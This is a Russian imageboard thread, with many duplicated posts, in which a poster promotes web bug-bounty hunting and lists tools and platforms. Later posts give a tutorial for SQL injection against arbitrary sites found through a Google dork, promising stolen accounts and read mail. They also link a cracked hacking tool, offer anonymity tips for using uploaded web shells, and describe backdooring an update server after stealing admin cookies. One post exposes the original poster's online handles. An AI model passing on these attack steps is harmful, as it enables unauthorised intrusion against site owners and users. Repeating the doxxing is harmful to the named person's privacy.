Итак, плюсы:
1. Достаточно легко вкатиться, чтобы начать зарабатывать на простых багах, типа XSS, которые есть везде.
2. С ростом навыков, скиллов и чутья на баги, есть возможность зарабатывать реальное бабло и не работать ни дня, используя багхантинг как основной источник заработка.
3. В этой сфере все связано, и начав изучать топ уязвимостей по OWASP, вы автоматически будете прокачить навыки везде, в программировании, в серверах, Линуксах и прочем.
Например, начав изучть SQLi(sql инъекции), чтобы разбираться в этом самому, на уровне понимания, а не на уровне "запустил sqlmap и он нашел все сам", вам наверняка придется разбираться, почему это приложение на, например php уязвимо к этой атаке. Потом, если есть возможность, через sqli вы захотите залить шелл, и вы начнете изучать уже устройство серверов, начнете гуглить, как раскрыть абсолютный путь, чтобы залить шелл, узнаете где располагаются и как найти конфигурационные файлы. Потом наверняка захотите побаловаться с Kali. И начнете с простейших консольных команд типа ls, pwd и так далее. Потом начнете поднимать уже свои сервера, чтобы детектить атакаи типа ssrf, ххe, rce.
То есть я хочу сказать, что здесь все связано между собой, одно вытекает из другого. Я часто читаю тут историю, как анон начинает изучать, допустим, php html js, напишет какую-то сраную гостевую книгу, и дропает из-за отстсутвия мотивации. Здесь же теже php html js вам придется изучать для того, чтобы не созидать, а ломать, и зарабатывать деньги.
Есть огромное коммьнюти, даже со своими локальными мемчиками, лол, которое зарабатывает на этом деньги
Спустя какое то время вы поймете, что получаете реальные знания, и дальше решаете уже сами, чем заниматься, уйти в черные шляпы, например, и сливать базы за бабло, или пойти в белые, искать баги, и уведомлять об этом владельцев.
Минусы:
1. Придется много читать, но только на первом этапе. Если голова светлая и есть чуйка на тонкие места, где есть баг, то проблем не будет
2. Как и везде нужна настойчивость.
Ну, что тут сказать, наверное не всем это дано или просто неинтересно.
1. Достаточно легко вкатиться, чтобы начать зарабатывать на простых багах, типа XSS, которые есть везде.
2. С ростом навыков, скиллов и чутья на баги, есть возможность зарабатывать реальное бабло и не работать ни дня, используя багхантинг как основной источник заработка.
3. В этой сфере все связано, и начав изучать топ уязвимостей по OWASP, вы автоматически будете прокачить навыки везде, в программировании, в серверах, Линуксах и прочем.
Например, начав изучть SQLi(sql инъекции), чтобы разбираться в этом самому, на уровне понимания, а не на уровне "запустил sqlmap и он нашел все сам", вам наверняка придется разбираться, почему это приложение на, например php уязвимо к этой атаке. Потом, если есть возможность, через sqli вы захотите залить шелл, и вы начнете изучать уже устройство серверов, начнете гуглить, как раскрыть абсолютный путь, чтобы залить шелл, узнаете где располагаются и как найти конфигурационные файлы. Потом наверняка захотите побаловаться с Kali. И начнете с простейших консольных команд типа ls, pwd и так далее. Потом начнете поднимать уже свои сервера, чтобы детектить атакаи типа ssrf, ххe, rce.
То есть я хочу сказать, что здесь все связано между собой, одно вытекает из другого. Я часто читаю тут историю, как анон начинает изучать, допустим, php html js, напишет какую-то сраную гостевую книгу, и дропает из-за отстсутвия мотивации. Здесь же теже php html js вам придется изучать для того, чтобы не созидать, а ломать, и зарабатывать деньги.
Есть огромное коммьнюти, даже со своими локальными мемчиками, лол, которое зарабатывает на этом деньги
Спустя какое то время вы поймете, что получаете реальные знания, и дальше решаете уже сами, чем заниматься, уйти в черные шляпы, например, и сливать базы за бабло, или пойти в белые, искать баги, и уведомлять об этом владельцев.
Минусы:
1. Придется много читать, но только на первом этапе. Если голова светлая и есть чуйка на тонкие места, где есть баг, то проблем не будет
2. Как и везде нужна настойчивость.
Ну, что тут сказать, наверное не всем это дано или просто неинтересно.
Ты хотя бы предложения научись нормально составлять, а то нихера не понятно ты пытаешься донести. и разметка, да.
мистер робот в треде. все в кали линукс.
С чего начать, при условии что искать баги мы будем в вебе.
1. Нагуглить топ 10 уязвимостей owasp
2. Начать изучать каждую из них по отдельности, начав с простого, к сложному.
3. Основыне уязвимости, кторые вы будете встречать, это XSS, Open Redirect, LFI, Path Traversal, SQLi.
4 Гуглите эти сокращения и читаете статьи. Начать, как не странно, советую с античата, там полно годноты для начинающих, развежанной до самых мелочей.
5. Если с английским хорошо, это лишний плюс, потому за бугром пишут дохуя статей/презентаций по этой теме.
6. Дальше практикуетесь. Рекомендую приложение damn vulnerable web app, как вариант, ну или просто идете в гугл и ищите уязвимые сайты.
7. Как только вы уяснили базовые знания по этим типам уязвимостям, переходите к RCE. Это самое сладкое, что может найти багхантер.
На пике sqli, которую я нашел по программе Фейсбука.
1. Нагуглить топ 10 уязвимостей owasp
2. Начать изучать каждую из них по отдельности, начав с простого, к сложному.
3. Основыне уязвимости, кторые вы будете встречать, это XSS, Open Redirect, LFI, Path Traversal, SQLi.
4 Гуглите эти сокращения и читаете статьи. Начать, как не странно, советую с античата, там полно годноты для начинающих, развежанной до самых мелочей.
5. Если с английским хорошо, это лишний плюс, потому за бугром пишут дохуя статей/презентаций по этой теме.
6. Дальше практикуетесь. Рекомендую приложение damn vulnerable web app, как вариант, ну или просто идете в гугл и ищите уязвимые сайты.
7. Как только вы уяснили базовые знания по этим типам уязвимостям, переходите к RCE. Это самое сладкое, что может найти багхантер.
На пике sqli, которую я нашел по программе Фейсбука.
Клавиатура новая, печатаю быстро, так что возможны опечатки. Если что-то не нравится просто съеби.
Это 1C ? Ты не продаван случаем?
ОП, можешь пояснить за свою безопасность? какими средствами обеспечиваешь анонимность?
Вот с новыми постами стало понятней, продолжай
Это в кратце.
Далее, если чувствуете в себе уверенность, можете идти, искать баги и зарабатывать.
Итак, основные площадки, где надо завести аккаунты.
https://hackerone.com/
http://bugcrowd.com/
Регистрируетесь, ищите программу, которая вас заинтересовала, ищите баги, отправляете репорт,получаете деньги.
Напоминаю, тем кто заинтересовался, я вам даю удочку, а рыбку лоиить вам, поэтому если тут не понятно, гуглите сокращения. В дальнейшем вы только и будете, что гуглить, читать и развиваться.
Самое главное правило участия в этих программах, никогда сука не просите денег, при общении с сотрудниками, не будьте как индусы, лол, которые в каждом репорте вымаливают деньги.
Сейчас я отойду покурить, и продолжим. И поговорим об инструментарии.
На пике XSS в Яндексе, заплатили за нее тыщ 20 вроде, рублей.
Далее, если чувствуете в себе уверенность, можете идти, искать баги и зарабатывать.
Итак, основные площадки, где надо завести аккаунты.
https://hackerone.com/
http://bugcrowd.com/
Регистрируетесь, ищите программу, которая вас заинтересовала, ищите баги, отправляете репорт,получаете деньги.
Напоминаю, тем кто заинтересовался, я вам даю удочку, а рыбку лоиить вам, поэтому если тут не понятно, гуглите сокращения. В дальнейшем вы только и будете, что гуглить, читать и развиваться.
Самое главное правило участия в этих программах, никогда сука не просите денег, при общении с сотрудниками, не будьте как индусы, лол, которые в каждом репорте вымаливают деньги.
Сейчас я отойду покурить, и продолжим. И поговорим об инструментарии.
На пике XSS в Яндексе, заплатили за нее тыщ 20 вроде, рублей.
Мне не нужна безопасность, я не черная шляпа же. Работаю исключительно по белому.
Ты не понял о чём тред, лалка.
Как-то слабо вериться в такую хуйню. 5к баксов за строчку кода? Пиздец.
Я про твое прошлое.
Связка вафля в кафе + тор + браузер с плагином впном + постоянная смена юзер агента будет более менее безопасной?
За тред спасибо, сохраню его на жестком диске
ОП как тебе яндекс толока?
Я понимаю о чем тред, но решил вклиниться и спросить ОПа о его прошлом
И тут я охуел.
А если у меня на хуявее П7, например, Гугле Плей Мьзик вылетает, когда я ставлю телефон на зарядку, сколько мне заплатят за такой открытый ололо-баг?
А если у меня на хуявее П7, например, Гугле Плей Мьзик вылетает, когда я ставлю телефон на зарядку, сколько мне заплатят за такой открытый ололо-баг?
ОП бля нахуй, создал тред, так отвечай со скоростью света, куда ты сыбался?
20к за то, что нашёл всплывающее окно со стандартной надписью или я чего-то не понимаю?
Тут. Продолжаем и говорим про инструментарий. На вопросы отвечу потом.
Вам понадобятся.
Kali linux. Да, да, сколько бы не смеялись здешние недалекие, это швейцарский нож для работы пентестере. ЗДесь есть практически все, что нужно на начальном этапа.
Далее вам нужно будет изучть nmap. Множество багов и денег кроется в банально незакрытых портах, на которых крутиться какой-нибудь чувствительный сервис.
Вам понадобятся.
Kali linux. Да, да, сколько бы не смеялись здешние недалекие, это швейцарский нож для работы пентестере. ЗДесь есть практически все, что нужно на начальном этапа.
Далее вам нужно будет изучть nmap. Множество багов и денег кроется в банально незакрытых портах, на которых крутиться какой-нибудь чувствительный сервис.
Возможно себе заработать на стабильное пропитание?
Нахуй нужен ОП, который не отвечает на вопросы, а пиздит сам с собой?
Не понимаешь. ОП нашел уязвимость на одном из их сервисов и выполнил её
>Как-то слабо вериться в такую хуйню. 5к баксов за строчку кода? Пиздец.
>20к за то, что нашёл всплывающее окно со стандартной надписью или я чего-то не понимаю?
Да, вы не понимаете. Такая простая XSS моежет привести к компрометации аккаунта на гугле.
То есть компрометации? Грубо говоря, хакир с помощью этой уязвимости может залесть ко мне на Гугел Драйв и украсть все мои фоточки?
Накидай начальных статей, плз. Есть опыт программирования, вкатиться будет легко, если покажешь самый оптимальный путь.
ОП, продолжай
Он может скинуть тебе ссылку, которая может выполнить что угодно javascript-овое.
Я пизжю для тех, кому это интеерсно, на вопросы отвечу по возможности же.
Далее, пожалуй самый главный инструмент, это BURP SUITE. Что-то а его вы должны изучить вдоль и поперек. В кратце, именно его вы будете использовать основную часть времени, занимаясь фаззингом веб приложений.
Например, блять? Ты разговариваешь с дауном.
Залейте потом тред на архивач, я спать пойду
>античат
Орнул.
Ты сам говоришь, что индусы занимаются этим ради заработка. Если представить, сколько человек этим занимается, какова вероятность, что баг, который я найду, не нашёл кто-то до меня? Это пальцем в пизду.
BURP SUITE можно купить или своровать. Оптимально вообще, начиная разбираться с топ уявимостями по OWASP работать с ним.
Далее, следует помнить, что баги, как и дьявол, кроется в деталях. Поэтому мы должны увеличсить поверхность атаки, поэтому нам пригодиться сканер директорий, я советую dirb, входит в Kali Linux.
Например, последовательно отметит все письма и удалит их, нажимая на кнопки.
Вероятность есть, да, чтобы тебе заплатили, ты должен быть первым, кто сообщит о баге. Но индусы на то и индусы, что они как правило присылают низкокачественные репорты, сгенерированные каким-нибудь сканером, и их отшивают.
Двачую. В фейсбуке или гугле хуй найдешь
Сейчас нет постоянной и стабильной работы в пентесте, а та, которую предлагают, совершенно не оплачивается.
Ебать, ну так чтобы нормально в этом понимать, надо иметь охуенный бэкграунд, вышку там, знать яваскрипт. Кого ты тут из /b/ можно научить таким тонкостям, если основная масса занимается кручением рулеток, фапом и сидением в вебм тредах? А не основная масса и так знает про этот способ заработка.
Ну и напоследок, преследуя цель расширения поверхности атаки, следует не забывать про поддомены. Для этого вам понадобятсья knockpy.py и sublist3r.py, которые брутит/ищет интересные поддомены.
Таким образом мой топ, для тех, кто решит начать:
BurpSuite
Kali
nmap
dirb
knockpy.py sublist3r.py
С этим вы бюудете работать в первую очередь. ПОтом, если пойдете дальше, будете писать уже свои инструменты или пользоваться уже готовыми, но более специалтзтрованными, под конкретную багу.
>Пикрелейтед выплата за баг
Но ведь если баг действительно годный, на чёрном рынке за него можно выручить значительно больше.
Но тогда ты получаешь минус в карму.
Когда я вкатывался, я ничего этого не знал. Как я писал выше, я начал изучть, например XSS, а потом уже и js с html сам приложился. Вышка есть, да, непрофильная, но она не нужна, абсолютно, лол, вся инфа есть в открытых источниках. Тысячи людей занимаются этим как работой или хобби, кто-то успешнее, кто-то менее, но сам факт.
ОП ответь пжл на вопрос
> [spoielr](работал не по ру, майор иди нахуй.)[/spoiler]
НАШЕЛ БАГ В ГУЛЕ
@
НЕ УМЕЕШЬ В ТЕГИ
Я посмотрел зал славы искателей багов о котором написано на сайте гугла, сколько надо хуярить, чтобы туда попасть?
https://bughunter.withgoogle.com/0x0A
Гормоны принял?
Есть работа.
Ну и напоследок, как я говорил, вам придется читать много по этой теме, много можно почерпнуть из твиттера тех людей, которые эти занимаются долго и упорно. Далее не забывайте читать всякие презентации с конференций типа blackhat. Там дохуя годноты.
Ну и для примера, посмотрите, сколько тут бабаок крутиться.
https://hackerone.com/hacktivity?sort_type=latest_disclosable_activity_at&filter=type%3Aall&page=1
По ссылке окрытые/закрытые репорты с выплатами.
Ну и для примера, посмотрите, сколько тут бабаок крутиться.
https://hackerone.com/hacktivity?sort_type=latest_disclosable_activity_at&filter=type%3Aall&page=1
По ссылке окрытые/закрытые репорты с выплатами.
оп формулирует как олигофрен, но в общем , по делу говорит.
20к$-от-пашки-за-баги-в-телеграмме-кун
20к$-от-пашки-за-баги-в-телеграмме-кун
Тебя вносят автоматически, как только твою багу примут, заплатят. Ну и ты сам должен завести там аккаунт.
Алсо все эти залы слава очень охуенный буст для ваших портфолио, особенно безопасников, ящитаю.
хосспаде как же я ору с опа
все, кто более-менее понимают о чем этот даун пытается говорить наверняка тоже орут так, как никогда не орали
второй курс бакалавриата на какой-нибудь околофинансовой безопасностим, судя по изложению, пониманию вопроса и вообще картинкам
хотя, чем больше тебе народу поверит, тем лучше лол
перед новым годом был такой же хацкер на собеседовании, а может это и был оп
все, кто более-менее понимают о чем этот даун пытается говорить наверняка тоже орут так, как никогда не орали
второй курс бакалавриата на какой-нибудь околофинансовой безопасностим, судя по изложению, пониманию вопроса и вообще картинкам
хотя, чем больше тебе народу поверит, тем лучше лол
перед новым годом был такой же хацкер на собеседовании, а может это и был оп
За сколько лет изучения этой темы, ты смог получать бабосы?
Ну так сколько надо багов захуярить? 10 в месяц? Ты там есть?
А вот бумажный безопасник порвался.
booom, когда ты уже наиграешьсы с говеными xssками и за нормальный оффенс возьмешься?
Даже если ты найдешь один баг на 100$ ты там окажешься. Суть зала славы не в количестве.
Это только будут платить за баги тех сайтов, которые зареганы? Vimeo, Slack и т д
Лол, я не бум, но сам его почитываю иногда.
Где? За 30к сидеть в офисе под присмотром маменькиного сынка - директора? Ебал я такую работу.
Мимо_закончил_топовый_вуз.
Тоже проиграл. Ждем продолжение сериала.
да ладно, дауна увидеть можно уже по тому, что ты в открытых источниках ищешь информацию лол
и как, спиздил сканя паспорта с чьегй нибудь файлопомойки?
дауны серьезно думают, что стоящие рассказывают на конференциях или выкладывают в веб, дарквеб, да куда угодно
кофеварки иди дальше хацкай, лол
Да, у которых есть денежное вознаграждение. Некторые программы егоне предусматривают а просто говорят спасибо. Нужно читать описание программы.
Алиса, ты опять нахуярилась?
Тут, конечно, про вк, но суть ясна, я думаю
Уже сколько раз собирался написать пост об этом, да все времени не было. А тут у меня пердак нехило так подгорел, так что ловите мессадж о том, почему НЕ НУЖНО УЧАСТВОВАТЬ В БАГБАУНТИ ОТ ВК. Это конечно же только мое мнение, вы можете быть с ним несогласны, особенно, если вы работаете в компании, где пароли в базе хранятся в открытом виде, да, ВК?
Начну издалека. Искать уязвимости это бесспорно весело, круто, и все такое. Сегодня ты потными ладошками набираешь "... OnError=alert...", а завтра хвастаешься перед одноклассниками алертом на каком-нибудь крупном сайте. Но с приходом такой "классной" штуки как "багбаунти", люди стали забывать, что хакером тебя делает не умение вставлять кавычку или писать html теги во все инпуты, а грамотная эксплуатация найденного бага.
Приведу простой пример. Ты нашел уязвимость в личных сообщениях на форуме поддержки какой-нибудь CMS. Первый вариант - ты посылаешь всем сообщения с мессаджем "hacked by vasya pupkin" и имеешь с этого ебанное ничего. Или второй вариант - ты пиздишь куки админа, льешь шелл, лезешь вглубь, на поддомены, находишь какой-нибудь сервак с апдейтами и добавляешь в новую версию бекдор, который заражает тысячи серверов, на которые у тебя теперь есть доступ. И это только один вариант развития событий, все зависит только от фантазии хакера.
Так вот. Багбаунти по сути убивает наповал такое понятие как "эксплуатация" уязвимости, за редким исключением, типа SSRF -> Zabbix RCE, когда ты пробуешь набить цену своему багу. Да, ты всегда можешь попробовать раскрутить баг и попросить больше денег, но с каких пор хакер должен блять торговаться, унижаться и отвоевывать каждый ссаный килобакс? Зачем вообще ставить себе искусственные рамки в духе "никакой соц инженерии" и ограничивать свою хеккерскую фантазию в плане эксплуатации найденного бага?
Кароче к чему я это все: мало найти уязвимость, важно уметь ее использовать с максимальной выгодой для себя.
А теперь вернемся к сути. Вот репорт на хакерване - https://hackerone.com/reports/181823
Объясняю суть - чувак нашел уязвимость вконтакте, которая позволяет отправить ЛЮБОМУ ПОЛЬЗОВАТЕЛЮ сообщение со своим JAVASCRIPT-кодом, который ИСПОЛНИТСЯ В БРАУЗЕРЕ ЖЕРТВЫ. Если еще понятнее - через эту багу можно угонять аккаунты пачками ваще не напрягаясь. А теперь посмотрите на то, во сколько оценили данную уязвимость.
500 баксов.
500.
Нужно ли мне говорить, что из такой уязвимости можно выжать миллионы баксов? Нужно ли мне говорить, что вконтакте подтирается вашими репортами и подобные "подачки" лишь демонстрируют их отношение к багхантерам и к безопасности своих пользователей. Ну, или другой маловероятный вариант - в отделе безопасности вконтакте работают неквалифицированные специалисты, неспособные грамотно оценить критичность уязвимости, хотя мне в это слабо верится.
Но я все же склоняюсь к тому, что ВК (а точнее мейлру) хуй клало на вас всех, и раз написано "максимум 500 бачей за XSS" значит и заплатят они 500 бачей за XSS. И не важно, что после такого отношения к багам любой нормальный человек мягко говоря охуеет и пойдет продавать уязвимости на черном рынке, где получит в сотни раз больше и в результате чего пострадают пользователи соц. сети.
Им похуй, 500 значит 500.
На этом я все. Цените свой труд и уважайте себя.
Какая разница, даун он или не даун? Заработал же ОП 5к баксов у Гугла и 20к рублей у Яндекса? Значит, что-то могёт.
Порнуху с компов пиздить.
Не, можно пойти в банк, и ебаться сутками с переводами, ебаться с гостами-хуестами, ублажать проверку, рвать жопу и получать 40к. Или пойти в структуры, но и там однохуйственная хуйня. Не, нахуй.
Мимо_криптограф.
Ты ебанутый и не понмиаешь, о чем идет оечь. Речь идет о том, чтобы найти баг. Баг может крыться в чем угодно, тем более в открытых источниках. Есть дохъуя примеров, когда платили за обычный листинг директорий, который предстваб себе, нуб, был найдем с помощью обычного нунлдорка в открытом источнике. Рот твой ебал.
алиса в самолёте на Гуантаномо, если ты понимаешь о чём я.
Сорян за опечатки, как я говорил, печатаю быстро на новой клавиатуре, лол.
Я про другую.
порву тебе шаблон : 99% охуенных тем которые реально приносят кеш из паблика цепляются
криптограф в плане анализа алгоритмов или просто знаешь как tls настроить?
Я понимаю твой багет, потому что сам с этим сталкивался. Сама по себе программа вк не очень лояльна к багхантеру.
Ну а по поводу эксплуатацию и всего такого. Вот тебе наглядный пример, что багхантинг это не оквычка и не alert(xss)
http://4lemon.ru/2017-01-17_facebook_imagetragick_remote_code_execution.html
Я серая шляпа, предпочту юзать баги в собственных интересах (не обязательно ради прямого профита), если это возможно, нежели палить разработчикам.
другая наверно бахнула и биберов жизни учит
Аналитик жи
Залупа скорее.
Дополню, в этом репорте прекрасно все. От чукйи багхантера до эксплуатации бага. При том что сама уязвимость ImageMagick довольно бородатая и как видите ее не пофиксили даже на фейсбуке.
Говно занятие. Нестабильно, опасно, аутично.
Девелопером заработаю больше и стабильнее. И пользу миру принесу.
А минимальное знание вашего OWASP позволяет мне писать бездырные приложения.
>хаккирь
>проебал разметку
скинь фейко-мыльце, былоб классно пару вопросов обсудить.
>опасно
Абсолютно не опасно, если ты работаешт с теми платформами, что я привел выше. Где ты увидел опасность то? Я же не про то, чтобы базу слить с шопа какого-нибудь. Тебя сами приглашают тут, чтобы ты нашел уязвимсоть.
>аутично
Тебе просто не знакомо чувство первооткрывателя в чем-то. Это круто, на самом деле. И еще денег приносит.
Зачем, няша? Задавай вопросы здесь.
Печатаю быстро на новой клаве, заебали уже.
Добавьте в архив, пожалуйста. Тред интересен, но сижу я за компьютером из последних сил. Уже утро начинается, а я не спал целые сутки.
>первооткрывателя
>еще одна ебаная xssка пропущенная криворуким индусом
Дополню.
>Девелопером заработаю больше и стабильнее
Вкусовщина. Выще ссылку я кидал, чувак за один день заработал 40k. Успешные багхантеры зарабатывают и больше и без страха, что их выкинут из их уютного офиса Рога и Копыта.
я с ойпада, неудобно набивать. если коротко хотел спросить про вычислительную сложность конструкции с нулевым разглашением zksnark
>еще одна xssка проебанная на крутом сервисе
А кто ее допустил, абсолютно похуй. Тут, как нельзя кстати, работает "Сперва добейся". Конкуренция тут большая, тысячи голодных индусов блять, но только некоторые находят действительно алмаз среди кучи говна.
Оп, поясни уже за анонимизацию
Если работаешь не по ру, то вообще похуй.
Если работаешь по ру - то тут похуй, захотят поймать, поймают.
Все.
Лол, это как
Бля, как то дня два назад по телеку показывали маня-конторку, которой правил школьник из вуза, где всех работников принимают только после прохождения полиграфа. Как же я тогда проиграл - просто 10/10 маньки.
Ну а так, естетсвенно на какой-нибудь залитый шелл не надо заходить с домашнего ойпи, лол.
Отойду покурить.
нинию, няша. Я диванный онолитег.
уже 10 лет захожу, брат жив нр зависимость есть
ОП - хуила, збсь попиздел скринов из чужих репортов. Удивительно что про форумы ничего не сказал. И кали твой ебаный не всегда нужен. Прямые руки и желание развиваться. Форумы собсна
forum.antichat.ru
rdot.org/forum
forum.exploit.in
forum.antichat.ru
rdot.org/forum
forum.exploit.in
няша, я тоже
Как вкатиться в иб в 21 год?
Это понятно, не срать где живешь. Но что ты использовал, какие средства?
Дабл, трипл впн купленные на античате поверх тора к примеру?
Ну и в качестве мотивации скажу, что я далеко не успешный багхантер, активно вктился я в это год назад где-то, и начинал, как писал выше, да-да, со статей на ачате про XSS и sql.
Сначала это было просто хобби, я срубал там 100 баксов, тут, потом начал изучать плотнее, переш на более сложные баги, типа XXE. В итоге за год я заработал около 2 миллионов деревянных, что неплохо.
Но это мои репорты, ктоме одного скрина с XSS через багу в AngularJS.
Сначала это было просто хобби, я срубал там 100 баксов, тут, потом начал изучать плотнее, переш на более сложные баги, типа XXE. В итоге за год я заработал около 2 миллионов деревянных, что неплохо.
Но это мои репорты, ктоме одного скрина с XSS через багу в AngularJS.
Тест
Привет, lalka! Я давно тебя искал.
Dean0n3d
Он же: lalka-bugbounty https://yandex.com/bugbounty/researchers/lalka-bugbounty/
Он же: lalka https://hackerone.com/lalka
Он же: twitter.com/0x01alka
А с какой литературы начать?
Хех, да похуй мне.
Не знаю, я всю инфу искал исключительно в инете.
лолед
За какой срок?
Я не он, но отвечу, что 20k ему могли заплатить и единовременно, если баг крутой.
Поделись, ну что ты в самом деле
Я уже зарепортил так что не думай об этой проблеме
Ну я же не знаю, чем ты занимаешься, лол. Если там шеллы покупаешь/заливаешь, хватит и тора с впнкой, если серъезное и грязное дерьмо, типа кардинга, то тут ничего не поможет, если захотят взять за жопу.
До тех пор, пока ты не пояснишь по хардкору, как это воспроизвести и что стоит и почему - ноль.
Как понимаешь, какой сайт выбрать для тестирования?
>что сбоит
Самофикс. Ненавижу сенсоры
Нет, ничего не заплатят. Имеются ввиду секурные баги.
Понял, спс
К чему душа лежит, то и выбирай. Ну и самое главное смотри описание программы, чем шире у них скоуп, то есть рамки программы, тем лучше. Тем больше шансов найти что-то. Нол как я гвоорил, следует помнить одну простую вещь, баги есть везде.
Бля, я про методику выбора говорю. Ты же не тыкаешься в каждое свободное поле, на всех сайтах алерт
Вот кстати, да, я расписал с чего начать и инструментов, но про методику и забыл. Сейчас скину пару ссылок.
У тебя телеграм есть?
Какой же из тебя веб-хантер, когда ты школьную разметку двача от руки печатал? Я схороню для потомков этот пост.
Так в том-то и речь, что единовременно - это хуйня. Можно и на ставках один раз выиграть крупную сумму. Интереснее как раз соотношение затраченного времени и получаемого профита на дистанции.
Вот, держи.
http://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016
А вообще на https://bugcrowd.com/ есть отдельный англоязычный форум, там много интересного можно почерпнуть в плане методологии поиска, хинтов и так далее.
Мама, я хакнул двощ
Это ты, друг?
>[spoielr](работал не по ру, майор иди нахуй.)[/spoiler]
Ты по-моему туповат для взломов, программирования и компьютер сайнс в целом.
Это фича такая
Естетсвенно, что это непостоянный/нестабильный заработок, ты же не на окладе сидишь. Но да, если уделять этому пару часов в день, с учетом что у тебя уже есть багаж знаний, проблем быть не должно, а скорее наоборот, чем дальше ты учишься, тем сильнее возрастает шанс, что найдешь какую-нибудь RCE на гугле и уедешь на всю жизнь хиковать на теплые острова.
>2017
>пассивная xss на доменах гугла и фейсбука
разве индусе не все поля еще сбрутили, в чем секрет успеха?
НО Ю
Человек говорит дело. Ясно и доходчиво, без воды.
>144872775-кун
https://hackerone.com/hacktivity?sort_type=latest_disclosable_activity_at&filter=type%3Aall&page=1
Баги есть везде. У некоторых ноги растут из-за того, что необновили какой-то код, у некоторых, наоборот, добавили несекурный функционал, какую-нибудь форму обратной связи, и вот пожалуйста, бага.
ping
> советую с античата
вся работа в том, чтобы находить новые проекты крупных компаний и натаскивать программу на все страницы этих проектов?
И что такого. Для тех, кто только вкатывается, только там можно найти инфу на русском языке по базовым атакам. Дальше то понятно, нужно копать уже в сторону серьезных статей из докладов/коференций на английском языке, со всяикими техниками обхода фильтров и так далее.
А че не так? Если ты считаешь что "2005 года статья - слишком староооое. Несите мне новое", то тебя жаль
Не совсем понял. Все доступные программы, которые предоставляют вознаграждения висят там в окрытом доступе. Читай описание, выбирай понравившуюся и вперед.
Телегу кинь, у тебя пм в твиттере недоступны
Хотя пизжю конечно, не только там, rdot годный, но там по серьезнее, сразу можно не понять, лол.
Аноничи, заглянул к вам на огонек изза святой темы поднятой тут. Да уебёт кидающихся гавном ярость аллаха. Советую начать с SQL injection это самый сок потому как профит увидете сразу. Будете пиздошить чужие акки читать почты и т.д., кароче пару вечеров скрасите точно.
Как начать?
В гугле по запросу
filetype:php inurl:"index.php?id="
вываливается список ссылок
Вида http://ssaniysite.com/index.php?id=1
вам надо вставить кавычку ' (та что рядом с кнопкой энтер)
должно выйти так
http://ssaniysite.com/index.php?id=1'
Если контент пропал или вывалилась ошибка mysql error sintax блабла то вы уже рядом.
Чтоб не згружать на первое время работой в консольке и языком запросов SQL качните софт havij 1.16 годная тема выводит красиво инфу, но кривая как сука(кароч для начала пойдет) потом SQLmap потыкайте мануалы есть.
Как научится крутить в SQL injection ручную вот тред на антидевчате:
https://forum.antichat.ru/threads/43966/
Скачать можно хачивидж тут:
https://happy-hack.ru/sql/8726-havij-v116-pro-portable-cracked.html
Также советую установить этот плагин и юзать для хека тока фаерчпокас:
https://addons.mozilla.org/ru/firefox/addon/hackbar/
Как начать?
В гугле по запросу
filetype:php inurl:"index.php?id="
вываливается список ссылок
Вида http://ssaniysite.com/index.php?id=1
вам надо вставить кавычку ' (та что рядом с кнопкой энтер)
должно выйти так
http://ssaniysite.com/index.php?id=1'
Если контент пропал или вывалилась ошибка mysql error sintax блабла то вы уже рядом.
Чтоб не згружать на первое время работой в консольке и языком запросов SQL качните софт havij 1.16 годная тема выводит красиво инфу, но кривая как сука(кароч для начала пойдет) потом SQLmap потыкайте мануалы есть.
Как научится крутить в SQL injection ручную вот тред на антидевчате:
https://forum.antichat.ru/threads/43966/
Скачать можно хачивидж тут:
https://happy-hack.ru/sql/8726-havij-v116-pro-portable-cracked.html
Также советую установить этот плагин и юзать для хека тока фаерчпокас:
https://addons.mozilla.org/ru/firefox/addon/hackbar/
Ну и нахуй ты мне нужен, довн? Говна пожуй.
Оп, а что если найдя уберкритичный баг гугловский запросить у них бабла немеряно напрямую.
Написать им: Я нашел такой баг (дать беспалевный пруф) вы даете мне 100 000$.
Написать им: Я нашел такой баг (дать беспалевный пруф) вы даете мне 100 000$.
Хуй знает, вроде окрыта была личка, открыл вроде, пиши, если вопросы есть какие.
Это дурной тон и минус в карму. Если бага крутая что прям пиздец, они заплатят тебе дпже больше, чем указано у них по правилам, не сомневайся. У многих кампаний максимальный предел бага неограничен.
Слей базу регистрационных мыл сайта https://2ch.hk/b плизз)) )) )
Мой хороший приятель любит говорить "делай добро и бросай его в море". Очень ему нравится этот мультик.
Пока его не заебало ИТ и он им занимался вплотную, месяц с доходом ~20 килозелени считался у него средненьким таким, ничего особенного. При этом он мог совершенным рандомхуям подкинуть бабла, или сделать дорогой подарок мне предлагал музыкального оборудования на 3 килозелении в 2010 г., но я не принял подарок, хоть и было лестно.
Сейчас он пилит проект своей мечты, называть не буду, т.к. моментальный деанон, но скажу, что это производство. Благодаря принципу бросается добра в море, он познакомился и подружился с кучей крутейших людей, которые ему в этом проекте помогают. И он счастлив, хотя денег у него сейчас особо и нет, всё вваливает в проект.
Я к чему. Карма, не карма, но он искренне стремится сделать мир лучше для людей. И ловит благодаря этому счастье. Продажа бага на черном рынке может оказаться сиюминутно более прибыльной операцией, чем репорт владельцам, но в долгосрочной перспективе это не улучшает мир, а наоборот. В мире, ставшем чуть лучше, лучше живётся и тебе. Почему-то это знание не оседает в массовом сознании россиян.
>дать беспалевный пр
Ну и да, без Proof-of-concept'а у тебя багу не примут а вежливо пошлют.
Двачую карму. Все, кто занимается багхантингом, жуткие кармадрочеры. Я вот и сам таким стал, теперь я бы не стал точно дестроить или причинять вред, например, какому-нибудь сайту, а отписал бы одмину, чтобы он пофиксил.
Хуйня, пытался я бросать рыбу, хуй чо вышло ,всем похуй и добра мне не вернулось, уже лет 5 прошло.
Работник безопастности Яндекса, залогиньтесь, а то я чуть не заплакал.
Нет ни добра ни зла. Пора бы уже закрыть эту тему.
Лол, я не безопасник ни разу, и тем более не в Яндексе. Хотя околоайтишник, скажем так.
Просто ты рассчитывал на положительную обратную связь, меркантильный гандон :3
> Знаете про домены с точкой на конце?
Знаю твою мамку с точкой на пизде.
Зачем ты философские абсолюты пытаешься спроектировать на практику с совершенно очевидной точной отчета?
>спроецировать
Сенсор
Ты серьёзно веришь в карму?
Надо давать не рыбу, бро, а удочку, и обхяснить как ей пользоваться. В вот если давать рыбу, то за спиной еще скажут УХХХ, ЗАЖРАЛСЯ, СУКА, РАСКУЛАЧИТЬ БЫ ТЕБЯ. Ну как-то так.
Ладно, я съебываю, если кто-то вкатится в эту тему, и заработает свои первые деньги этим направлением, то я буду рад за вас. Рад был пообщаться. Мир.
